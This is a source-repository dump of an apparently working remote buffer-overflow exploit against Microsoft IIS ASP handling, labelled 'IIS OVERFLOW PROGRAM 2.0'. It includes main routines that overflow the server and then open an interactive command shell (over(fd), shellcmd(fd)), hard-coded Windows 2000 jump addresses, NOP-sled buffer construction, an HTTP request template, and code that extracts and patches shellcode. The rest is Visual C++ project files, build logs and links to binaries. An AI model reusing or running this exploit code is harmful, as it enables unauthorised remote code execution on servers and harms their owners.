16 | #include "..\include\over.c"
17 | #include "..\include\getshellcode.c"
18 | #include "..\include\overinfo.c"
19 | 
20 | #include "shellcode.c"
21 | 
22 | #include "getoverstr.c"
23 | 
24 | 
25 | 
26 | int main(int argc, char **argv)
27 | { 
28 |   
29 |   int     fd;
30 |   getvar(argc,argv);
31 |   fd=server_socket;
32 |   
33 | 
34 | 
35 |   over(fd);
36 |   shellcmd(fd);
37 | 
38 |   closesocket(fd);
39 |   WSACleanup( );
40 |   return(0);
41 | }
42 | 


--------------------------------------------------------------------------------
/aspcode/main.dsp:
--------------------------------------------------------------------------------
 1 | # Microsoft Developer Studio Project File - Name="main" - Package Owner=<4>
 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
 3 | # ** DO NOT EDIT **
 4 | 
 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103
 6 | 
 7 | CFG=main - Win32 Debug
 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
 9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE 
11 | !MESSAGE NMAKE /f "main.mak".
12 | !MESSAGE 
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE 
16 | !MESSAGE NMAKE /f "main.mak" CFG="main - Win32 Debug"
17 | !MESSAGE 
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE 
20 | !MESSAGE "main - Win32 Release" (based on "Win32 (x86) Console Application")
21 | !MESSAGE "main - Win32 Debug" (based on "Win32 (x86) Console Application")
22 | !MESSAGE 
23 | 
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | RSC=rc.exe
30 | 
31 | !IF  "$(CFG)" == "main - Win32 Release"
32 | 
33 | # PROP BASE Use_MFC 0
34 | # PROP BASE Use_Debug_Libraries 0
35 | # PROP BASE Output_Dir "Release"
36 | # PROP BASE Intermediate_Dir "Release"
37 | # PROP BASE Target_Dir ""
38 | # PROP Use_MFC 0
39 | # PROP Use_Debug_Libraries 0
40 | # PROP Output_Dir "Release"
41 | # PROP Intermediate_Dir "Release"
42 | # PROP Target_Dir ""
43 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
44 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
45 | # ADD BASE RSC /l 0x804 /d "NDEBUG"
46 | # ADD RSC /l 0x804 /d "NDEBUG"
47 | BSC32=bscmake.exe
48 | # ADD BASE BSC32 /nologo
49 | # ADD BSC32 /nologo
50 | LINK32=link.exe
51 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
52 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
53 | 
54 | !ELSEIF  "$(CFG)" == "main - Win32 Debug"
55 | 
56 | # PROP BASE Use_MFC 0
57 | # PROP BASE Use_Debug_Libraries 1
58 | # PROP BASE Output_Dir "Debug"
59 | # PROP BASE Intermediate_Dir "Debug"
60 | # PROP BASE Target_Dir ""
61 | # PROP Use_MFC 0
62 | # PROP Use_Debug_Libraries 1
63 | # PROP Output_Dir "Debug"
64 | # PROP Intermediate_Dir "Debug"
65 | # PROP Target_Dir ""
66 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
67 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
68 | # ADD BASE RSC /l 0x804 /d "_DEBUG"
69 | # ADD RSC /l 0x804 /d "_DEBUG"
70 | BSC32=bscmake.exe
71 | # ADD BASE BSC32 /nologo
72 | # ADD BSC32 /nologo
73 | LINK32=link.exe
74 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
75 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
76 | 
77 | !ENDIF 
78 | 
79 | # Begin Target
80 | 
81 | # Name "main - Win32 Release"
82 | # Name "main - Win32 Debug"
83 | # Begin Source File
84 | 
85 | SOURCE=.\main.c
86 | # End Source File
87 | # End Target
88 | # End Project
89 | 


--------------------------------------------------------------------------------
/aspcode/main.dsw:
--------------------------------------------------------------------------------
 1 | Microsoft Developer Studio Workspace File, Format Version 6.00
 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
 3 | 
 4 | ###############################################################################
 5 | 
 6 | Project: "main"=.\main.dsp - Package Owner=<4>
 7 | 
 8 | Package=<5>
 9 | {{{
10 | }}}
11 | 
12 | Package=<4>
13 | {{{
14 | }}}
15 | 
16 | ###############################################################################
17 | 
18 | Global:
19 | 
20 | Package=<5>
21 | {{{
22 | }}}
23 | 
24 | Package=<3>
25 | {{{
26 | }}}
27 | 
28 | ###############################################################################
29 | 
30 | 


--------------------------------------------------------------------------------
/aspcode/main.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/main.ncb


--------------------------------------------------------------------------------
/aspcode/main.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/main.opt


--------------------------------------------------------------------------------
/aspcode/main.plg:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | <pre>
 4 | <h1>Build Log</h1>
 5 | <h3>
 6 | --------------------Configuration: main - Win32 Debug--------------------
 7 | </h3>
 8 | <h3>Command Lines</h3>
 9 | Creating temporary file "D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP64.tmp" with contents
10 | [
11 | /nologo /MLd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Debug/main.pch" /YX /Fo"Debug/" /Fd"Debug/" /FD /GZ /c 
12 | "C:\T2306\aspcode\main.c"
13 | ]
14 | Creating command line "cl.exe @D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP64.tmp" 
15 | Creating temporary file "D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP65.tmp" with contents
16 | [
17 | kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:yes /pdb:"Debug/main.pdb" /debug /machine:I386 /out:"Debug/main.exe" /pdbtype:sept 
18 | .\Debug\main.obj
19 | ]
20 | Creating command line "link.exe @D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP65.tmp"
21 | <h3>Output Window</h3>
22 | Compiling...
23 | main.c
24 | c:\t2306\include\inout.c(30) : warning C4047: 'initializing' : 'int *' differs in levels of indirection from 'const char ** '
25 | c:\t2306\include\getvar.c(30) : warning C4018: '<' : signed/unsigned mismatch
26 | c:\t2306\include\sendrecv.c(32) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
27 | c:\t2306\include\sendrecv.c(33) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 1
28 | c:\t2306\include\over.c(8) : warning C4013: 'GetOverStr' undefined; assuming extern returning int
29 | c:\t2306\include\getshellcode.c(12) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
30 | c:\t2306\include\getshellcode.c(12) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
31 | c:\t2306\include\getshellcode.c(22) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
32 | c:\t2306\include\getshellcode.c(22) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
33 | c:\t2306\include\getshellcode.c(34) : warning C4013: '_chkesp' undefined; assuming extern returning int
34 | c:\t2306\include\getshellcode.c(35) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
35 | c:\t2306\include\getshellcode.c(35) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
36 | c:\t2306\include\getshellcode.c(10) : warning C4101: 'j' : unreferenced local variable
37 | c:\t2306\include\getshellcode.c(54) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
38 | c:\t2306\include\getshellcode.c(54) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
39 | c:\t2306\include\getshellcode.c(64) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)(char *)'
40 | c:\t2306\include\getshellcode.c(64) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
41 | c:\t2306\include\getshellcode.c(77) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
42 | c:\t2306\include\getshellcode.c(77) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
43 | c:\t2306\include\getshellcode.c(109) : warning C4305: '=' : truncation from 'const int ' to 'char '
44 | c:\t2306\aspcode\shellcode.c(96) : warning C4047: '=' : 'char *' differs in levels of indirection from 'const unsigned int '
45 | c:\t2306\aspcode\shellcode.c(115) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int *'
46 | c:\t2306\aspcode\shellcode.c(156) : warning C4102: 'execptprogram' : unreferenced label
47 | c:\t2306\aspcode\shellcode.c(219) : warning C4047: 'initializing' : 'int (__stdcall *)()' differs in levels of indirection from 'char *'
48 | c:\t2306\aspcode\shellcode.c(244) : warning C4047: '=' : 'int *' differs in levels of indirection from 'const unsigned int '
49 | c:\t2306\aspcode\shellcode.c(245) : warning C4133: '=' : incompatible types - from 'char *' to 'int *'
50 | c:\t2306\aspcode\shellcode.c(258) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
51 | c:\t2306\aspcode\shellcode.c(266) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
52 | c:\t2306\aspcode\shellcode.c(278) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
53 | c:\t2306\aspcode\shellcode.c(281) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
54 | c:\t2306\aspcode\shellcode.c(282) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
55 | c:\t2306\aspcode\shellcode.c(289) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
56 | c:\t2306\aspcode\shellcode.c(292) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
57 | c:\t2306\aspcode\shellcode.c(293) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
58 | c:\t2306\aspcode\shellcode.c(315) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
59 | c:\t2306\aspcode\shellcode.c(316) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
60 | c:\t2306\aspcode\shellcode.c(321) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
61 | c:\t2306\aspcode\shellcode.c(323) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
62 | c:\t2306\aspcode\shellcode.c(329) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int *'
63 | c:\t2306\aspcode\shellcode.c(346) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
64 | c:\t2306\aspcode\shellcode.c(347) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
65 | c:\t2306\aspcode\shellcode.c(358) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
66 | c:\t2306\aspcode\shellcode.c(359) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
67 | c:\t2306\aspcode\shellcode.c(360) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
68 | c:\t2306\aspcode\shellcode.c(362) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
69 | c:\t2306\aspcode\shellcode.c(703) : warning C4102: 'execptprogram' : unreferenced label
70 | c:\t2306\aspcode\shellcode.c(195) : warning C4101: 'msvcrtdlladd' : unreferenced local variable
71 | c:\t2306\aspcode\shellcode.c(194) : warning C4101: 'memcpyadd' : unreferenced local variable
72 | c:\t2306\aspcode\shellcode.c(200) : warning C4101: 'Ntdlladd' : unreferenced local variable
73 | c:\t2306\aspcode\shellcode.c(197) : warning C4101: 'Aspdlladd' : unreferenced local variable
74 | Linking...
75 | 
76 | 
77 | 
78 | <h3>Results</h3>
79 | main.exe - 0 error(s), 50 warning(s)
80 | </pre>
81 | </body>
82 | </html>
83 | 


--------------------------------------------------------------------------------
/aspcode/overinfo.c:
--------------------------------------------------------------------------------
1 | 
2 | void  printinfo()
3 | { 
4 | strout("\r\nIIS OVERFLOW PROGRAM 2.0.\r\n");
5 | //strout("\r\nCopy by yuange 2001.05.03.\r\n");
6 | } 


--------------------------------------------------------------------------------
/aspcode/shellcode.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/shellcode.c


--------------------------------------------------------------------------------
/aspcodeview/Debug/main.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/main.exe


--------------------------------------------------------------------------------
/aspcodeview/Debug/main.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/main.ilk


--------------------------------------------------------------------------------
/aspcodeview/Debug/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/main.obj


--------------------------------------------------------------------------------
/aspcodeview/Debug/main.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/main.pch


--------------------------------------------------------------------------------
/aspcodeview/Debug/main.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/main.pdb


--------------------------------------------------------------------------------
/aspcodeview/Debug/vc60.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/vc60.idb


--------------------------------------------------------------------------------
/aspcodeview/Debug/vc60.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/Debug/vc60.pdb


--------------------------------------------------------------------------------
/aspcodeview/getoverstr.c:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | //#include "getshellcode.c"
 4 | 
 5 | 
 6 | 
 7 | 
 8 | int  getoverbuff(char *overbuff)
 9 | {
10 | 
11 |  //*********************************************************************************************
12 |   char  eipjmpespwin2000tw[]="\xb6\x37\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
13 |   char  eipretwin2000tw[]="\xb7\x37\xfc\x7f"; 
14 |   char  eipjmpebxwin2000tw[]="\xbc\x36\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
15 |   char  eipjmpeaxwin2000tw[]="\x2e\x36\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
16 |   
17 |   char  *eipretwin2000add=eipretwin2000tw;
18 |   char  *eipjmpespwin2000add=eipjmpespwin2000tw;
19 |   char  *eipjmpebxwin2000add=eipjmpebxwin2000tw;
20 |   char  *eipjmpeaxwin2000add=eipjmpeaxwin2000tw;
21 | 
22 |   //*********************************************************************************************
23 | 
24 |   
25 |   #define  RETEIPADDRESS 0x100
26 |   char  jmpshell[]="BBBB\xff\x63\x78";
27 |   char  buff[BUFFSIZE];
28 |   int   i;
29 | 
30 |   memset(buff,NOPCODE,BUFFSIZE);
31 |   strcpy(buff+0x10000-4,".asp");
32 |   strcpy(overbuff,buff);
33 |   return strlen(buff);
34 | }
35 | 
36 | 
37 | int  GetOverStr(char *buffer,char *server,char *urlfile,int offset)
38 | {
39 | 
40 |   char    shellcodebuff[BUFFSIZE];
41 |   char    overbuff[BUFFSIZE];
42 |   int     postbytes;
43 |   char    *url="/test.php";
44 |   char    *htr="+%3f.htr";
45 | 
46 |   char    overstr[]="GET %s%s HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n";
47 |  
48 |   if(urlfile!=NULL) url=urlfile;
49 |   getoverbuff(overbuff);
50 |  // postbytes=GetShellcode(shellcodebuff);
51 |   _snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server);
52 |   return (strlen(buffer));
53 | }


--------------------------------------------------------------------------------
/aspcodeview/getshellcode.c:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | 
  4 | int  GetFindShellcode(char *buffer)
  5 | {
  6 | 
  7 |   char    *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  8 |   char    *shellcodefnadd,*chkespadd;
  9 |   char    shellcodebuff[BUFFSIZE];
 10 |   int     i,j,k;
 11 |  
 12 |   shellcodefnadd=getfnaddress(shellcodefnlock);
 13 |   
 14 |   for(k=0;k<=BUFFSIZE;++k){
 15 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 16 |   }
 17 |   for(i=0;i<=BUFFSIZE;++i){
 18 | 		 if(memcmp(shellcodefnadd+k+FNENDLONG+i,fnendstr,FNENDLONG)==0) break;
 19 |   }
 20 |   memcpy(buffer,shellcodefnadd+k+FNENDLONG,i);
 21 | 
 22 |   shellcodefnadd=getfnaddress(findshellcodefn);
 23 | 
 24 |   for(k=0;k<=BUFFSIZE;++k){
 25 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 26 |   }
 27 | 
 28 |   memcpy(shellcodebuff,shellcodefnadd,k); 
 29 | 
 30 |   _asm{
 31 | 		 mov ESI,ESP
 32 | 		 cmp ESI,ESP
 33 |   }
 34 |   _chkesp();
 35 |   chkespadd=getfnaddress(_chkesp);
 36 |   
 37 |   cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 38 |   k=codeshell(buffer+i,BUFFSIZE-i,shellcodebuff,k);
 39 |   i=i+k;
 40 | 
 41 |   return i;
 42 | }
 43 | 
 44 | 
 45 | 
 46 | int  GetShellcode(char *buffer)
 47 | {
 48 | 
 49 |   char    *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 50 |   char    *shellcodefnadd,*chkespadd;
 51 |   char    shellcodebuff[BUFFSIZE];
 52 |   int     i,j,k;
 53 |  
 54 |   shellcodefnadd=getfnaddress(shellcodefnlock);
 55 |   
 56 |   for(k=0;k<=BUFFSIZE;++k){
 57 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 58 |   }
 59 |   for(i=0;i<=BUFFSIZE;++i){
 60 | 		 if(memcmp(shellcodefnadd+k+FNENDLONG+i,fnendstr,FNENDLONG)==0) break;
 61 |   }
 62 |   memcpy(buffer,shellcodefnadd+k+FNENDLONG,i);
 63 | 
 64 |   shellcodefnadd=getfnaddress(shellcodefn);
 65 | 
 66 |   for(k=0;k<=BUFFSIZE;++k){
 67 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 68 |   }
 69 | 
 70 |   memcpy(shellcodebuff,shellcodefnadd,k); 
 71 | 
 72 |   _asm{
 73 | 		 mov ESI,ESP
 74 | 		 cmp ESI,ESP
 75 |   }
 76 |   _chkesp();
 77 |   chkespadd=getfnaddress(_chkesp);
 78 |   
 79 |   cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 80 |   j=getapistr(shellcodebuff+k);
 81 |   k=k+j;
 82 |   k=codeshell(buffer+i,BUFFSIZE-i,shellcodebuff,k);
 83 |   i=i+k;
 84 | 
 85 |   return i;
 86 | }
 87 | 
 88 | 
 89 | 
 90 | 
 91 | void cleanchkesp(char *fnadd,char *shellbuff,char *chkesp,int len)
 92 | { 
 93 |    int i,k;
 94 |    unsigned char temp;
 95 |    char *calladd;
 96 | 
 97 |    for(i=0;i<len;++i)
 98 |    {
 99 | 	   temp=shellbuff[i];
100 |        if(temp==0xe8)
101 | 	   {
102 |          k=*(int *)(shellbuff+i+1);
103 | 		 calladd=fnadd;
104 | 		 calladd+=k;
105 | 		 calladd+=i;
106 | 		 calladd+=5;
107 | 		 if(calladd==chkesp)
108 | 		 {
109 | 			 shellbuff[i]=0x90;
110 | 			 shellbuff[i+1]=0x43;   // inc ebx
111 | 		     shellbuff[i+2]=0x4b;	// dec ebx
112 | 			 shellbuff[i+3]=0x43;
113 | 			 shellbuff[i+4]=0x4b;
114 | 		 }
115 | 	   }
116 |    }
117 | }
118 | 
119 | 
120 | char *getfnaddress(char *fn)
121 | {
122 | 	unsigned char temp;
123 |     temp=*fn;
124 |     if(temp==0xe9)
125 | 	{
126 | 		 fn+=*(int*)(fn+1);
127 | 		 fn+=5;
128 | 	}
129 | 	return(fn);
130 | }
131 |  	
132 | 


--------------------------------------------------------------------------------
/aspcodeview/main.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h> 
 2 | #include <winsock.h>
 3 | #include <stdio.h>
 4 | #include <httpext.h>
 5 | 
 6 | #pragma  comment(lib,"ws2_32")
 7 | 
 8 | #include "..\include\main.h"
 9 | #include "..\include\jmpadd.h"
10 | #include "..\include\inout.c"
11 | #include "..\include\getvar.c"
12 | #include "..\include\cmd.c"
13 | #include "..\include\sendrecv.c"
14 | #include "..\include\over.c"
15 | #include "..\include\getshellcode.c"
16 | #include "..\include\overinfo.c"
17 | 
18 | #include "..\include\shellcode.c"
19 | 
20 | #include "getoverstr.c"
21 | 
22 | 
23 | 
24 | int main(int argc, char **argv)
25 | { 
26 |   
27 |   int     fd;
28 |   getvar(argc,argv);
29 |   fd=server_socket;
30 |  
31 |   over(fd);
32 |   shellcmd(fd);
33 | 
34 |   closesocket(fd);
35 |   WSACleanup( );
36 |   return(0);
37 | }
38 | 


--------------------------------------------------------------------------------
/aspcodeview/main.dsp:
--------------------------------------------------------------------------------
 1 | # Microsoft Developer Studio Project File - Name="main" - Package Owner=<4>
 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
 3 | # ** DO NOT EDIT **
 4 | 
 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103
 6 | 
 7 | CFG=main - Win32 Debug
 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
 9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE 
11 | !MESSAGE NMAKE /f "main.mak".
12 | !MESSAGE 
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE 
16 | !MESSAGE NMAKE /f "main.mak" CFG="main - Win32 Debug"
17 | !MESSAGE 
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE 
20 | !MESSAGE "main - Win32 Release" (based on "Win32 (x86) Console Application")
21 | !MESSAGE "main - Win32 Debug" (based on "Win32 (x86) Console Application")
22 | !MESSAGE 
23 | 
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | RSC=rc.exe
30 | 
31 | !IF  "$(CFG)" == "main - Win32 Release"
32 | 
33 | # PROP BASE Use_MFC 0
34 | # PROP BASE Use_Debug_Libraries 0
35 | # PROP BASE Output_Dir "Release"
36 | # PROP BASE Intermediate_Dir "Release"
37 | # PROP BASE Target_Dir ""
38 | # PROP Use_MFC 0
39 | # PROP Use_Debug_Libraries 0
40 | # PROP Output_Dir "Release"
41 | # PROP Intermediate_Dir "Release"
42 | # PROP Target_Dir ""
43 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
44 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
45 | # ADD BASE RSC /l 0x804 /d "NDEBUG"
46 | # ADD RSC /l 0x804 /d "NDEBUG"
47 | BSC32=bscmake.exe
48 | # ADD BASE BSC32 /nologo
49 | # ADD BSC32 /nologo
50 | LINK32=link.exe
51 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
52 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
53 | 
54 | !ELSEIF  "$(CFG)" == "main - Win32 Debug"
55 | 
56 | # PROP BASE Use_MFC 0
57 | # PROP BASE Use_Debug_Libraries 1
58 | # PROP BASE Output_Dir "Debug"
59 | # PROP BASE Intermediate_Dir "Debug"
60 | # PROP BASE Target_Dir ""
61 | # PROP Use_MFC 0
62 | # PROP Use_Debug_Libraries 1
63 | # PROP Output_Dir "Debug"
64 | # PROP Intermediate_Dir "Debug"
65 | # PROP Target_Dir ""
66 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
67 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
68 | # ADD BASE RSC /l 0x804 /d "_DEBUG"
69 | # ADD RSC /l 0x804 /d "_DEBUG"
70 | BSC32=bscmake.exe
71 | # ADD BASE BSC32 /nologo
72 | # ADD BSC32 /nologo
73 | LINK32=link.exe
74 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
75 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
76 | 
77 | !ENDIF 
78 | 
79 | # Begin Target
80 | 
81 | # Name "main - Win32 Release"
82 | # Name "main - Win32 Debug"
83 | # Begin Source File
84 | 
85 | SOURCE=.\main.c
86 | # End Source File
87 | # End Target
88 | # End Project
89 | 


--------------------------------------------------------------------------------
/aspcodeview/main.dsw:
--------------------------------------------------------------------------------
 1 | Microsoft Developer Studio Workspace File, Format Version 6.00
 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
 3 | 
 4 | ###############################################################################
 5 | 
 6 | Project: "main"=.\main.dsp - Package Owner=<4>
 7 | 
 8 | Package=<5>
 9 | {{{
10 | }}}
11 | 
12 | Package=<4>
13 | {{{
14 | }}}
15 | 
16 | ###############################################################################
17 | 
18 | Global:
19 | 
20 | Package=<5>
21 | {{{
22 | }}}
23 | 
24 | Package=<3>
25 | {{{
26 | }}}
27 | 
28 | ###############################################################################
29 | 
30 | 


--------------------------------------------------------------------------------
/aspcodeview/main.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/main.ncb


--------------------------------------------------------------------------------
/aspcodeview/main.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/main.opt


--------------------------------------------------------------------------------
/aspcodeview/main.plg:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | <pre>
 4 | <h1>Build Log</h1>
 5 | <h3>
 6 | --------------------Configuration: main - Win32 Debug--------------------
 7 | </h3>
 8 | <h3>Command Lines</h3>
 9 | Creating temporary file "E:\DOCUME~1\yuange\LOCALS~1\Temp\RSP5B.tmp" with contents
10 | [
11 | /nologo /MLd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Debug/main.pch" /YX /Fo"Debug/" /Fd"Debug/" /FD /GZ /c 
12 | "C:\T2306\aspcodeview\main.c"
13 | ]
14 | Creating command line "cl.exe @E:\DOCUME~1\yuange\LOCALS~1\Temp\RSP5B.tmp" 
15 | Creating temporary file "E:\DOCUME~1\yuange\LOCALS~1\Temp\RSP5C.tmp" with contents
16 | [
